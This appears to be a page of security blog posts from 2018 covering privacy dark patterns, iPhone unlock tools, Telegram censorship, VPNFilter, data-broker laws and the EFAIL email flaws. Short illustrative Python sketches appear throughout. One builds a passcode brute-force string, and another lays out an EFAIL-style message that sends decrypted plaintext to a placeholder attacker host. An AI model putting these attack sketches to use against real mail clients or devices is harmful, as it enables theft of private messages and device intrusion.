Friday Squid Blogging: Fried Squid with Turmeric
Good-looking recipe.
As usual, you can also use this squid post to talk about the security stories in the news that I haven’t covered.
Read my blog posting guidelines here.
Here’s some interesting research about how we perceive threats. Basically, as the environment becomes safer, we manufacture new threats. From an essay about the research:
To study how concepts change when they become less common, we brought volunteers into our laboratory and gave them a simple task—to look at a series of computer-generated faces and decide which ones seem “threatening.” The faces had been carefully designed by researchers to range from very intimidating to very harmless.
As we showed people fewer and fewer threatening faces over time, we found that they expanded their definition of “threatening” to include a wider range of faces. In other words, when they ran out of threatening faces to find, they started calling faces threatening that they used to call harmless. Rather than being a consistent category, what people considered “threats” depended on how many threats they had seen lately.
This has a lot of implications in security systems where humans have to make judgments about threat and risk: TSA agents, police noticing “suspicious” activities, “see something say something” campaigns, and so on.
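The mechanism is easy to simulate. Here’s a minimal sketch in Python (my own illustration, not the researchers’ code) of a judge who flags whatever scores high relative to recently seen faces; the “threat scores” are arbitrary:

import random

def judge(scores, history, window=200, quantile=0.9):
    # Flag a face as "threatening" if it scores above the 90th
    # percentile of recently seen faces: the category boundary is
    # relative to recent experience, not fixed.
    flagged = 0
    threshold = None
    for s in scores:
        history.append(s)
        recent = sorted(history[-window:])
        threshold = recent[int(len(recent) * quantile)]
        if s >= threshold:
            flagged += 1
    return flagged, threshold

def faces(n, threat_rate):
    # High scores for "threatening" faces, low for harmless ones.
    return [random.uniform(0.6, 1.0) if random.random() < threat_rate
            else random.uniform(0.0, 0.4) for _ in range(n)]

random.seed(0)
history = []
f1, t1 = judge(faces(1000, 0.50), history)  # threats are common
f2, t2 = judge(faces(1000, 0.05), history)  # threats become rare
print(f"threshold with common threats: {t1:.2f}")
print(f"threshold with rare threats:   {t2:.2f}")

With common threats the cutoff sits near the top of the range; once threats become rare it drops into the range the judge previously called harmless, which is the study’s finding in miniature.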
The academic paper.
The Norwegian Consumer Council just published an excellent report on the deceptive practices tech companies use to trick people into giving up their privacy.
From the executive summary:
Facebook and Google have privacy intrusive defaults, where users who want the privacy friendly option have to go through a significantly longer process. They even obscure some of these settings so that the user cannot know that the more privacy intrusive option was preselected.
The popups from Facebook, Google and Windows 10 have design, symbols and wording that nudge users away from the privacy friendly choices. Choices are worded to compel users to make certain choices, while key information is omitted or downplayed. None of them lets the user freely postpone decisions. Also, Facebook and Google threaten users with loss of functionality or deletion of the user account if the user does not choose the privacy intrusive option.
[…]
The combination of privacy intrusive defaults and the use of dark patterns, nudge users of Facebook and Google, and to a lesser degree Windows 10, toward the least privacy friendly options to a degree that we consider unethical. We question whether this is in accordance with the principles of data protection by default and data protection by design, and if consent given under these circumstances can be said to be explicit, informed and freely given.
I am a big fan of the Norwegian Consumer Council. They’ve published some excellent research.
The IEEE came out in favor of strong encryption:
IEEE supports the use of unfettered strong encryption to protect confidentiality and integrity of data and communications. We oppose efforts by governments to restrict the use of strong encryption and/or to mandate exceptional access mechanisms such as “backdoors” or “key escrow schemes” in order to facilitate government access to encrypted data. Governments have legitimate law enforcement and national security interests. IEEE believes that mandating the intentional creation of backdoors or escrow schemes—no matter how well intentioned—does not serve those interests well and will lead to the creation of vulnerabilities that would result in unforeseen effects as well as some predictable negative consequences.
The full statement is here.
Last week, a story was going around explaining how to brute-force an iOS password. Basically, the trick was to plug the phone into an external keyboard and try every PIN at once:
We reported Friday on Hickey’s findings, which claimed to be able to send all combinations of a user’s possible passcode in one go, by enumerating each code from 0000 to 9999, and concatenating the results in one string with no spaces. He explained that because this doesn’t give the software any breaks, the keyboard input routine takes priority over the device’s data-erasing feature.
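The claimed input is trivial to construct. A minimal sketch of the enumeration (my illustration; just the string, nothing device-specific):

# Every four-digit PIN from 0000 to 9999, concatenated with no spaces.
# The claim was that, sent as one uninterrupted keyboard input, iOS
# would process the whole stream before its data-erasing logic ran.
payload = "".join(f"{pin:04d}" for pin in range(10000))
print(len(payload))   # 40000 characters
print(payload[:20])   # 00000001000200030004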
I didn’t write about it, because it seemed too good to be true. A few days later, Apple pushed back on the findings—and it seems that it doesn’t work.
This isn’t to say that no one can break into an iPhone. We know that companies like Cellebrite and Grayshift are renting/selling iPhone unlock tools to law enforcement—which means governments and criminals can do the same thing—and that Apple is releasing a new feature called “restricted mode” that may make those hacks obsolete.
Grayshift is claiming that its technology will still work.
Former Apple security engineer Braden Thomas, who now works for a company called Grayshift, warned customers who had bought his GrayKey iPhone unlocking tool that iOS 11.3 would make it a bit harder for cops to get evidence and data out of seized iPhones. A change in the beta didn’t break GrayKey, but would require cops to use GrayKey on phones within a week of them being last unlocked.
“Starting with iOS 11.3, iOS saves the last time a device has been unlocked (either with biometrics or passcode) or was connected to an accessory or computer. If a full seven days (168 hours) elapse [sic] since the last time iOS saved one of these events, the Lightning port is entirely disabled,” Thomas wrote in a blog post published in a customer-only portal, which Motherboard obtained. “You cannot use it to sync or to connect to accessories. It is basically just a charging port at this point. This is termed USB Restricted Mode and it affects all devices that support iOS 11.3.”
Whether that’s real or marketing, we don’t know.
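If the description is accurate, the policy itself is simple. A minimal sketch of the check as Thomas describes it (my illustration, obviously not Apple’s code):

from datetime import datetime, timedelta

SEVEN_DAYS = timedelta(hours=168)  # the window Thomas describes

def usb_data_allowed(last_unlock_or_connect, now):
    # If a full seven days pass since the last unlock or
    # accessory/computer connection, the Lightning port stops
    # carrying data and becomes a charge-only port.
    return now - last_unlock_or_connect < SEVEN_DAYS

# Example: a phone seized eight days ago and untouched since.
seized = datetime(2018, 6, 1)
print(usb_data_allowed(seized, seized + timedelta(days=8)))  # False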
We’re starting to see research into designing speculative execution systems that avoid Spectre- and Meltdown-like security problems. Here’s one.
I don’t know if this particular design is secure. My guess is that we’re going to see several iterations of design and attack before we settle on something that works. But it’s good to see the research results emerge.
News article.
In this 2013 TED talk, oceanographer Edith Widder explains how her team captured the giant squid on video.
As usual, you can also use this squid post to talk about the security stories in the news that I haven’t covered.
Read my blog posting guidelines here.
The Center for Human Rights in Iran has released a report outlining the effects of that country’s ban on Telegram, a secure messaging app used by about half of the country.
The ban will disrupt the most important, uncensored platform for information and communication in Iran, one that is used extensively by activists, independent and citizen journalists, dissidents and international media. It will also impact electoral politics in Iran, as centrist, reformist and other relatively moderate political groups that are allowed to participate in Iran’s elections have been heavily and successfully using Telegram to promote their candidates and electoral lists during elections. State-controlled domestic apps and media will not provide these groups with such a platform, even as they continue to do so for conservative and hardline political forces in the country, significantly aiding the latter.
From a Wired article:
Researchers found that the ban has had broad effects, hindering and chilling individual speech, forcing political campaigns to turn to state-sponsored media tools, limiting journalists and activists, curtailing international interactions, and eroding businesses that grew their infrastructure and reach off of Telegram.
It’s interesting that the analysis doesn’t really center around the security properties of Telegram, but more around its ubiquity as a messaging platform in the country.
I missed this story when it came around last year: someone tried to steal a domain name at gunpoint. He was just sentenced to 20 years in jail.
Algeria shut the Internet down nationwide to prevent high-school students from cheating on their exams.
The solution in New South Wales, Australia, was to ban smartphones.
EDITED TO ADD (6/22): Slashdot thread.
Apple is rolling out an iOS security usability feature called Security code AutoFill. The basic idea is that the OS scans incoming SMS messages for security codes and suggests them in AutoFill, so that people can use them without having to memorize or type them.
Sounds like a really good idea, but Andreas Gutmann points out an application where this could become a vulnerability: when authenticating transactions:
Transaction authentication, as opposed to user authentication, is used to attest the correctness of the intention of an action rather than just the identity of a user. It is most widely known from online banking, where it is an essential tool to defend against sophisticated attacks. For example, an adversary can try to trick a victim into transferring money to a different account than the one intended. To achieve this the adversary might use social engineering techniques such as phishing and vishing and/or tools such as Man-in-the-Browser malware.
Transaction authentication is used to defend against these adversaries. Different methods exist but in the one of relevance here—which is among the most common methods currently used—the bank will summarise the salient information of any transaction request, augment this summary with a TAN tailored to that information, and send this data to the registered phone number via SMS. The user, or bank customer in this case, should verify the summary and, if this summary matches with his or her intentions, copy the TAN from the SMS message into the webpage.
This new iOS feature creates problems for the use of SMS in transaction authentication. Applied to 2FA, the user would no longer need to open and read the SMS from which the code has already been conveniently extracted and presented. Unless this feature can reliably distinguish between OTPs in 2FA and TANs in transaction authentication, we can expect that users will also have their TANs extracted and presented without context of the salient information, e.g. amount and destination of the transaction. Yet, precisely the verification of this salient information is essential for security. Examples of where this scenario could apply include a Man-in-the-Middle attack on the user accessing online banking from their mobile browser, or where a malicious website or app on the user’s phone accesses the bank’s legitimate online banking service.
This is an interesting interaction between two security systems. Security code AutoFill eliminates the need for the user to view the SMS or memorize the one-time code. Transaction authentication assumes the user read and approved the additional information in the SMS message before using the one-time code.
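Gutmann’s concern is easy to see if you imagine how such a feature has to work. Apple hasn’t published its extraction method, but a naive version (my sketch, assuming a simple digit-run heuristic) pulls the code out of both kinds of message and discards exactly the context the user is supposed to verify:

import re

def extract_code(sms):
    # Naively grab the first 4-to-8-digit run as "the code."
    m = re.search(r"\b\d{4,8}\b", sms)
    return m.group(0) if m else None

otp = "Your login code is 482916."
tan = ("Transfer EUR 4,500.00 to account DE89...? "
       "If this matches your intention, enter TAN 482916.")

print(extract_code(otp))  # 482916 -- fine for 2FA
print(extract_code(tan))  # 482916 -- amount and destination are lost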
Jack Goldsmith and Stuart Russell just published an interesting paper, making the case that free and democratic nations are at a structural disadvantage in nation-on-nation cyberattack and defense. From a blog post:
It seeks to explain why the United States is struggling to deal with the “soft” cyber operations that have been so prevalent in recent years: cyberespionage and cybertheft, often followed by strategic publication; information operations and propaganda; and relatively low-level cyber disruptions such as denial-of-service and ransomware attacks. The main explanation is that constituent elements of U.S. society—a commitment to free speech, privacy and the rule of law; innovative technology firms; relatively unregulated markets; and deep digital sophistication—create asymmetric vulnerabilities that foreign adversaries, especially authoritarian ones, can exploit. These asymmetrical vulnerabilities might explain why the United States so often appears to be on the losing end of recent cyber operations and why U.S. attempts to develop and implement policies to enhance defense, resiliency, response or deterrence in the cyber realm have been ineffective.
I have long thought this to be true. There are defensive cybersecurity measures that a totalitarian country can take that a free, open, democratic country cannot. And there are attacks against a free, open, democratic country that just don’t matter to a totalitarian country. That makes us more vulnerable. (I don’t mean to imply—and neither do Russell and Goldsmith—that this disadvantage implies that free societies are overall worse, but it is an asymmetry that we should be aware of.)
I do worry that these disadvantages will someday become intolerable. Dan Geer often said that “the price of freedom is the probability of crime.” We are willing to pay this price because it isn’t that high. As technology makes individual and small-group actors more powerful, this price will get higher. Will there be a point in the future where free and open societies will no longer be able to survive? I honestly don’t know.
EDITED TO ADD (6/21): Jack Goldsmith also wrote this.
Tapplock sells an “unbreakable” Internet-connected lock that you can open with your fingerprint. It turns out that the lock is trivially insecure in several ways:
Regarding the third flaw, the manufacturer has responded that “…the lock is invincible to the people who do not have a screwdriver.”
You can’t make this stuff up.
EDITED TO ADD: The quote at the end is from a different smart lock manufacturer. Apologies for that.
It’s Cephalopod Week! “Three hearts, eight arms, can’t lose.”
As usual, you can also use this squid post to talk about the security stories in the news that I haven’t covered.
Read my blog posting guidelines here.
For many years, I have said that complexity is the worst enemy of security. At CyCon earlier this month, Thomas Dullien gave an excellent talk on the subject with far more detail than I’ve ever provided. Video. Slides.
Internet censors have a new strategy in their bid to block applications and websites: pressuring the large cloud providers that host them. These providers have concerns that are much broader than the targets of censorship efforts, so they have the choice of either standing up to the censors or capitulating in order to maximize their business. Today’s Internet largely reflects the dominance of a handful of companies behind the cloud services, search engines and mobile platforms that underpin the technology landscape. This new centralization radically tips the balance between those who want to censor parts of the Internet and those trying to evade censorship. When the profitable answer is for a software giant to acquiesce to censors’ demands, how long can Internet freedom last?
The recent battle between the Russian government and the Telegram messaging app illustrates one way this might play out. Russia has been trying to block Telegram since April, when a Moscow court banned it after the company refused to give Russian authorities access to user messages. Telegram, which is widely used in Russia, works on both iPhone and Android, and there are Windows and Mac desktop versions available. The app offers optional end-to-end encryption, meaning that all messages are encrypted on the sender’s phone and decrypted on the receiver’s phone; no part of the network can eavesdrop on the messages.
Since then, Telegram has been playing cat-and-mouse with the Russian telecom regulator Roskomnadzor by varying the IP address the app uses to communicate. Because Telegram isn’t a fixed website, it doesn’t need a fixed IP address. Telegram bought tens of thousands of IP addresses and has been quickly rotating through them, staying a step ahead of censors. Cleverly, this tactic is invisible to users. The app never sees the change, or the entire list of IP addresses, and the censor has no clear way to block them all.
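From the client side, the general technique looks something like this sketch (my illustration with placeholder addresses; Telegram’s actual mechanism, which pushes fresh addresses to the app, isn’t public):

import socket

# A pool of fallback addresses (placeholders from documentation
# ranges). When the censor blocks one, the client moves to the next;
# the pool itself can be refreshed from inside the app.
ENDPOINT_POOL = ["203.0.113.10", "203.0.113.11", "198.51.100.7"]

def connect(port=443, timeout=3):
    for ip in ENDPOINT_POOL:
        try:
            # First reachable (unblocked) endpoint wins.
            return socket.create_connection((ip, port), timeout=timeout)
        except OSError:
            continue  # blocked or unreachable: rotate to the next one
    raise ConnectionError("every endpoint in the pool is blocked")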
A week after the court ban, Roskomnadzor countered with an unprecedented move of its own: blocking 19 million IP addresses, many on Amazon Web Services and Google Cloud. The collateral damage was widespread: The action inadvertently broke many other web services that use those platforms, and Roskomnadzor scaled back after it became clear that its action had affected services critical for Russian business. Even so, the censor is still blocking millions of IP addresses.
More recently, Russia has been pressuring Apple not to offer the Telegram app in its iPhone App Store. As of this writing, Apple has not complied, and the company has allowed Telegram to download a critical software update to iPhone users (after what the app’s founder called a delay last month). Roskomnadzor could further pressure Apple, though, including by threatening to turn off its entire iPhone app business in Russia.
Telegram might seem a weird app for Russia to focus on. Those of us who work in security don’t recommend the program, primarily because of the nature of its cryptographic protocols. In general, proprietary cryptography has numerous fatal security flaws. We generally recommend Signal for secure SMS messaging, or, if having that program on your computer is somehow incriminating, WhatsApp. (More than 1.5 billion people worldwide use WhatsApp.) What Telegram has going for it is that it works really well on lousy networks. That’s why it is so popular in places like Iran and Afghanistan. (Iran is also trying to ban the app.)
What the Russian government doesn’t like about Telegram is its anonymous broadcast feature—channel capability and chats—which makes it an effective platform for political debate and citizen journalism. The Russians might not like that Telegram is encrypted, but odds are good that they can simply break the encryption. Telegram’s role in facilitating uncontrolled journalism is the real issue.
Iran’s attempts to block Telegram have been more successful than Russia’s, less because Iran’s censorship technology is more sophisticated and more because Telegram is not willing to go as far to defend Iranian users. The reasons are not rooted in business decisions. Simply put, Telegram is a Russian product and the designers are more motivated to poke Russia in the eye. Pavel Durov, Telegram’s founder, has pledged millions of dollars to help fight Russian censorship.
For the moment, Russia has lost. But this battle is far from over. Russia could easily come back with more targeted pressure on Google, Amazon and Apple. A year earlier, Zello used the same trick Telegram is using to evade Russian censors. Then, Roskomnadzor threatened to block all of Amazon Web Services and Google Cloud; and in that instance, both companies forced Zello to stop its IP-hopping censorship-evasion tactic.
Russia could also further develop its censorship infrastructure. If its capabilities were as finely honed as China’s, it would be able to more effectively block Telegram from operating. Right now, Russia can block only specific IP addresses, which is too coarse a tool for this issue. Telegram’s voice capabilities in Russia are significantly degraded, however, probably because high-capacity IP addresses are easier to block.
Whatever its current frustrations, Russia might well win in the long term. By demonstrating its willingness to suffer the temporary collateral damage of blocking major cloud providers, it prompted cloud providers to block another and more effective anti-censorship tactic, or at least accelerated the process. In April, Google and Amazon banned—and technically blocked—the practice of “domain fronting,” a trick anti-censorship tools use to get around Internet censors by pretending to be other kinds of traffic. Developers would use popular websites as a proxy, routing traffic to their own servers through another website—in this case Google.com—to fool censors into believing the traffic was intended for Google.com. The anonymous web-browsing tool Tor has used domain fronting since 2014. Signal, since 2016. Eliminating the capability is a boon to censors worldwide.
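Mechanically, domain fronting exploited the gap between the domain named in the TLS handshake, which the censor can see, and the one named in the encrypted HTTP Host header, which it cannot. A sketch of the idea (illustrative only; the backend name is a placeholder, and Google and Amazon now reject such mismatched requests):

import requests

# The censor observes a TLS connection to www.google.com. Inside the
# encrypted tunnel, the Host header steers the request to the real,
# blocked backend hosted on the same infrastructure.
resp = requests.get(
    "https://www.google.com/",                        # what the censor sees
    headers={"Host": "blocked-service.example.com"},  # placeholder backend
)
print(resp.status_code)

The provider’s countermeasure is simply to refuse mismatched pairs of TLS and Host names, which is exactly what Google and Amazon chose to do.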
Tech giants have gotten embroiled in censorship battles for years. Sometimes they fight and sometimes they fold, but until now there have always been options. What this particular fight highlights is that Internet freedom is increasingly in the hands of the world’s largest Internet companies. And while freedom may have its advocates—the American Civil Liberties Union has tweeted its support for those companies, and some 12,000 people in Moscow protested against the Telegram ban—actions such as disallowing domain fronting illustrate that getting the big tech companies to sacrifice their near-term commercial interests will be an uphill battle. Apple has already removed anti-censorship apps from its Chinese app store.
In 1993, John Gilmore famously said that “The Internet interprets censorship as damage and routes around it.” That was technically true when he said it but only because the routing structure of the Internet was so distributed. As centralization increases, the Internet loses that robustness, and censorship by governments and companies becomes easier.
This essay previously appeared on Lawfare.com.
iOS 12, the next release of Apple’s iPhone operating system, may include features to prevent someone from unlocking your phone without your permission:
The feature essentially forces users to unlock the iPhone with the passcode when connecting it to a USB accessory every time the phone has not been unlocked for one hour. That includes the iPhone unlocking devices that companies such as Cellebrite or GrayShift make, which police departments all over the world use to hack into seized iPhones.
“That pretty much kills [GrayShift’s product] GrayKey and Cellebrite,” Ryan Duff, a security researcher who has studied iPhone and is Director of Cyber Solutions at Point3 Security, told Motherboard in an online chat. “If it actually does what it says and doesn’t let ANY type of data connection happen until it’s unlocked, then yes. You can’t exploit the device if you can’t communicate with it.”
This is part of a bunch of security enhancements in iOS 12:
Other enhancements include tools for generating strong passwords, storing them in the iCloud keychain, and automatically entering them into Safari and iOS apps across all of a user’s devices. Previously, standalone apps such as 1Password have done much the same thing. Now, Apple is integrating the functions directly into macOS and iOS. Apple also debuted new programming interfaces that allow users to more easily access passwords stored in third-party password managers directly from the QuickType bar. The company also announced a new feature that will flag reused passwords, an interface that autofills one-time passwords provided by authentication apps, and a mechanism for sharing passwords among nearby iOS devices, Macs, and Apple TVs.
A separate privacy enhancement is designed to prevent websites from tracking people when using Safari. It’s specifically designed to prevent share buttons and comment code on webpages from tracking people’s movements across the Web without permission or from collecting a device’s unique settings such as fonts, in an attempt to fingerprint the device.
The last additions of note are new permission dialogues macOS Mojave will display before allowing apps to access a user’s camera or microphone. The permissions are designed to thwart malicious software that surreptitiously turns on these devices in an attempt to spy on users. The new protections will largely mimic those previously available only through standalone apps such as one called Oversight, developed by security researcher Patrick Wardle. Apple said similar dialog permissions will protect the file system, mail database, message history, and backups.
On May 25, the FBI asked us all to reboot our routers. The story behind this request is one of sophisticated malware and unsophisticated home-network security, and it’s a harbinger of the sorts of pervasive threats from nation-states, criminals and hackers that we should expect in coming years.
VPNFilter is a sophisticated piece of malware that infects mostly older home and small-office routers made by Linksys, MikroTik, Netgear, QNAP and TP-Link. (For a list of specific models, click here.) It’s an impressive piece of work. It can eavesdrop on traffic passing through the router (specifically, log-in credentials and SCADA traffic, a networking protocol that controls power plants, chemical plants and industrial systems), attack other targets on the Internet, and destructively “kill” its infected device. It is one of a very few pieces of malware that can survive a reboot, even though that’s what the FBI has requested. It has a number of other capabilities, and it can be remotely updated to provide still others. More than 500,000 routers in at least 54 countries have been infected since 2016.
Because of the malware’s sophistication, VPNFilter is believed to be the work of a government. The FBI suggested the Russian government was involved for two circumstantial reasons. One, a piece of the code is identical to one found in another piece of malware, called BlackEnergy, that was used in the December 2015 attack against Ukraine’s power grid. Russia is believed to be behind that attack. And two, the majority of those 500,000 infections are in Ukraine and controlled by a separate command-and-control server. There might also be classified evidence, as an FBI affidavit in this matter identifies the group behind VPNFilter as Sofacy, also known as APT28 and Fancy Bear. That’s the group behind a long list of attacks, including the 2016 hack of the Democratic National Committee.
Two companies, Cisco and Symantec, seem to have been working with the FBI during the past two years to track this malware as it infected ever more routers. The infection mechanism isn’t known, but we believe it targets known vulnerabilities in these older routers. Pretty much no one patches their routers, so the vulnerabilities have remained, even if they were fixed in new models from the same manufacturers.
On May 30, the FBI seized control of toknowall.com, a critical VPNFilter command-and-control server. This is called “sinkholing,” and serves to disrupt a critical part of this system. When infected routers contact toknowall.com, they will no longer be contacting a server owned by the malware’s creators; instead, they’ll be contacting a server owned by the FBI. This doesn’t entirely neutralize the malware, though. It will stay on the infected routers through reboot, and the underlying vulnerabilities remain, making the routers susceptible to reinfection with a variant controlled by a different server.
If you want to make sure your router is no longer infected, you need to do more than reboot it, the FBI’s warning notwithstanding. You need to reset the router to its factory settings. That means you need to reconfigure it for your network, which can be a pain if you’re not sophisticated in these matters. If you want to make sure your router cannot be reinfected, you need to update the firmware with any security patches from the manufacturer. This is harder to do and may strain your technical capabilities, though it’s ridiculous that routers don’t automatically download and install firmware updates on their own. Some of these models probably do not even have security patches available. Honestly, the best thing to do if you have one of the vulnerable models is to throw it away and get a new one. (Your ISP will probably send you a new one free if you claim that it’s not working properly. And you should have a new one, because if your current one is on the list, it’s at least 10 years old.)
So if it won’t clear out the malware, why is the FBI asking us to reboot our routers? It’s mostly just to get a sense of how bad the problem is. The FBI now controls toknowall.com. When an infected router gets rebooted, it connects to that server to get fully reinfected, and when it does, the FBI will know. Rebooting will give it a better idea of how many devices out there are infected.
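A sinkhole like this is conceptually just a server that answers in the attacker’s place and logs who calls home. A toy sketch (my illustration, certainly not the FBI’s infrastructure):

from http.server import BaseHTTPRequestHandler, HTTPServer

infected = set()  # one entry per unique address that phones home

class SinkholeHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        # Each rebooted router re-contacts its command-and-control
        # domain, which now resolves here; logging the source address
        # counts the infection without serving the malware anything.
        infected.add(self.client_address[0])
        self.send_response(404)
        self.end_headers()
        print(f"{len(infected)} unique infected hosts seen so far")

if __name__ == "__main__":
    HTTPServer(("0.0.0.0", 8080), SinkholeHandler).serve_forever()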
Should you do it? It can’t hurt.
Internet of Things malware isn’t new. The 2016 Mirai botnet, for example, created by a lone hacker and not a government, targeted vulnerabilities in Internet-connected digital video recorders and webcams. Other malware has targeted Internet-connected thermostats. Lots of malware targets home routers. These devices are particularly vulnerable because they are often designed by ad hoc teams without a lot of security expertise, stay around in networks far longer than our computers and phones, and have no easy way to patch them.
It wouldn’t be surprising if the Russians targeted routers to build a network of infected computers for follow-on cyber operations. I’m sure many governments are doing the same. As long as we allow these insecure devices on the Internet (and short of security regulations, there’s no way to stop them), we’re going to be vulnerable to this kind of malware.
And next time, the command-and-control server won’t be so easy to disrupt.
This essay previously appeared in the Washington Post.
EDITED TO ADD: The malware is more capable than we previously thought.
Interesting fossils. Note that a poster is available.
As usual, you can also use this squid post to talk about the security stories in the news that I haven’t covered.
Read my blog posting guidelines here.
When Mark Zuckerberg testified before both the House and the Senate last month, it became immediately obvious that few US lawmakers had any appetite to regulate the pervasive surveillance taking place on the Internet.
Right now, the only way we can force these companies to take our privacy more seriously is through the market. But the market is broken. First, none of us do business directly with these data brokers. Equifax might have lost my personal data in 2017, but I can’t fire them because I’m not their customer or even their user. I could complain to the companies I do business with who sell my data to Equifax, but I don’t know who they are. Markets require voluntary exchange to work properly. If consumers don’t even know where these data brokers are getting their data from and what they’re doing with it, they can’t make intelligent buying choices.
This is starting to change, thanks to a new law in Vermont and another in Europe. And more legislation is coming.
Vermont first. At the moment, we don’t know how many data brokers collect data on Americans. Credible estimates range from 2,500 to 4,000 different companies. Last week, Vermont passed a law that will change that.
The law does several things to improve the security of Vermonters’ data, but several provisions matter to all of us. First, the law requires data brokers that trade in Vermonters’ data to register annually. And while there are many small local data brokers, the larger companies collect data nationally and even internationally. This will help us get a more accurate look at who’s in this business. The companies also have to disclose what opt-out options they offer, and how people can request to opt out. Again, this information is useful to all of us, regardless of the state we live in. And finally, the companies have to disclose the number of security breaches they’ve suffered each year, and how many individuals were affected.
Admittedly, the regulations imposed by the Vermont law are modest. Earlier drafts of the law included a provision requiring data brokers to disclose how many individuals’ data they have in their databases, what sorts of data they collect and where the data came from, but those were removed as the bill negotiated its way into law. A more comprehensive law would allow individuals to demand to know exactly what information these companies have about them—and maybe allow individuals to correct and even delete data. But it’s a start, and the first statewide law of its kind to be passed in the face of strong industry opposition.
Vermont isn’t the first to attempt this, though. On the other side of the country, Representative Norma Smith of Washington introduced a similar bill in both 2017 and 2018. It goes further, requiring disclosure of what kinds of data the broker collects. So far, the bill has stalled in the state’s legislature, but she believes it will have a much better chance of passing when she introduces it again in 2019. I am optimistic that this is a trend, and that many states will start passing bills forcing data brokers to be increasingly transparent in their activities. And while their laws will be tailored to residents of those states, all of us will benefit from the information.
A 2018 California ballot initiative could help. Among its provisions, it gives consumers the right to demand exactly what information a data broker has about them. If it passes in November, once it takes effect, lots of Californians will take the list of data brokers from Vermont’s registration law and demand this information based on their own law. And again, all of us—regardless of the state we live in—will benefit from the information.
We will also benefit from another, much more comprehensive, data privacy and security law from the European Union. The General Data Protection Regulation (GDPR) was passed in 2016 and took effect on 25 May. The details of the law are far too complex to explain here, but among other things, it mandates that personal data can only be collected and saved for specific purposes and only with the explicit consent of the user. We’ll learn who is collecting what and why, because companies that collect data are going to have to ask European users and customers for permission. And while this law only applies to EU citizens and people living in EU countries, the disclosure requirements will show all of us how these companies profit off our personal data.
It has already reaped benefits. Over the past couple of weeks, you’ve received many e-mails from companies that have you on their mailing lists. In the coming weeks and months, you’re going to see other companies disclose what they’re doing with your data. One early example is PayPal: in preparation for GDPR, it published a list of the over 600 companies it shares your personal data with. Expect a lot more like this.
Surveillance is the business model of the Internet. It’s not just the big companies like Facebook and Google watching everything we do online and selling advertising based on our behaviors; there’s also a large and largely unregulated industry of data brokers that collect, correlate and then sell intimate personal data about our behaviors. If we make the reasonable assumption that Congress is not going to regulate these companies, then we’re left with the market and consumer choice. The first step in that process is transparency. These new laws, and the ones that will follow, are slowly shining a light on this secretive industry.
This essay originally appeared in the Guardian.
In 2016, the US was successfully deterred from attacking Russia in cyberspace because of fears of Russian capabilities against the US.
I have two citations for this. The first is from the book Russian Roulette: The Inside Story of Putin’s War on America and the Election of Donald Trump, by Michael Isikoff and David Corn. Here’s the quote:
The principals did discuss cyber responses. The prospect of hitting back with cyber caused trepidation within the deputies and principals meetings. The United States was telling Russia this sort of meddling was unacceptable. If Washington engaged in the same type of covert combat, some of the principals believed, Washington’s demand would mean nothing, and there could be an escalation in cyber warfare. There were concerns that the United States would have more to lose in all-out cyberwar.
“If we got into a tit-for-tat on cyber with the Russians, it would not be to our advantage,” a participant later remarked. “They could do more to damage us in a cyber war or have a greater impact.” In one of the meetings, Clapper said he was worried that Russia might respond with cyberattacks against America’s critical infrastructure—and possibly shut down the electrical grid.
The second is from the book The World as It Is, by President Obama’s deputy national security advisor Ben Rhodes. Here’s the New York Times writing about the book.
Mr. Rhodes writes he did not learn about the F.B.I. investigation until after leaving office, and then from the news media. Mr. Obama did not impose sanctions on Russia in retaliation for the meddling before the election because he believed it might prompt Moscow into hacking into Election Day vote tabulations. Mr. Obama did impose sanctions after the election but Mr. Rhodes’s suggestion that the targets include President Vladimir V. Putin was rebuffed on the theory that such a move would go too far.
When people try to claim that there’s no such thing as deterrence in cyberspace, this serves as a counterexample.
EDITED TO ADD: Remember the blog rules. Comments that are not about the narrow topic of deterrence in cyberspace will be deleted. Please take broader discussions of the 2016 US election elsewhere.
We all know that it happens: when we see a security warning too often—and without effect—we start tuning it out. A new paper uses fMRI, eye tracking, and field studies to prove it.
EDITED TO ADD (6/6): This blog post summarizes the findings.
Ross Anderson has a new paper on cryptocurrency exchanges. From his blog:
Bitcoin Redux explains what’s going wrong in the world of cryptocurrencies. The bitcoin exchanges are developing into a shadow banking system, which do not give their customers actual bitcoin but rather display a “balance” and allow them to transact with others. However if Alice sends Bob a bitcoin, and they’re both customers of the same exchange, it just adjusts their balances rather than doing anything on the blockchain. This is an e-money service, according to European law, but is the law enforced? Not where it matters. We’ve been looking at the details.
The paper.
Last week, researchers disclosed vulnerabilities in a large number of encrypted e-mail clients: specifically, those that use OpenPGP and S/MIME, including Thunderbird and AppleMail. These are serious vulnerabilities: An attacker who can alter mail sent to a vulnerable client can trick that client into sending a copy of the plaintext to a web server controlled by that attacker. The story of these vulnerabilities and the tale of how they were disclosed illustrate some important lessons about security vulnerabilities in general and e-mail security in particular.
But first, if you use PGP or S/MIME to encrypt e-mail, you need to check the list on this page and see if you are vulnerable. If you are, check with the vendor to see if they’ve fixed the vulnerability. (Note that some early patches turned out not to fix the vulnerability.) If not, stop using the encrypted e-mail program entirely until it’s fixed. Or, if you know how to do it, turn off your e-mail client’s ability to process HTML e-mail or—even better—stop decrypting e-mails from within the client. There’s even more complex advice for more sophisticated users, but if you’re one of those, you don’t need me to explain this to you.
Consider your encrypted e-mail insecure until this is fixed.
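To see why the advice is so drastic, it helps to look at the most direct variant of the attack, which needs no cryptanalysis at all: the attacker mails the stolen ciphertext back to the victim wrapped in HTML, and the victim’s own client decrypts it and leaks the plaintext in an image request. A sketch of the message structure (attacker.example is a placeholder; this is the shape of the trick, not working exploit code):

# The attacker sandwiches an encrypted part, captured in transit,
# between two HTML parts of one multipart message.
INTERCEPTED_CIPHERTEXT = "-----BEGIN PGP MESSAGE----- ..."  # placeholder

malicious_parts = [
    ("text/html", '<img src="http://attacker.example/'),  # opens an <img> URL
    ("multipart/encrypted", INTERCEPTED_CIPHERTEXT),       # the stolen part
    ("text/html", '">'),                                   # closes the tag
]
# A vulnerable client decrypts the middle part, merges all three into
# one HTML document, and "loads the image": an HTTP request to
# attacker.example whose path is the decrypted plaintext.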
All software contains security vulnerabilities, and one of the primary ways we all improve our security is by researchers discovering those vulnerabilities and vendors patching them. It’s a weird system: Corporate researchers are motivated by publicity, academic researchers by publication credentials, and just about everyone by individual fame and the small bug-bounties paid by some vendors.
Software vendors, on the other hand, are motivated to fix vulnerabilities by the threat of public disclosure. Without the threat of eventual publication, vendors are likely to ignore researchers and delay patching. This happened a lot in the 1990s, and even today, vendors often use legal tactics to try to block publication. It makes sense; they look bad when their products are pronounced insecure.
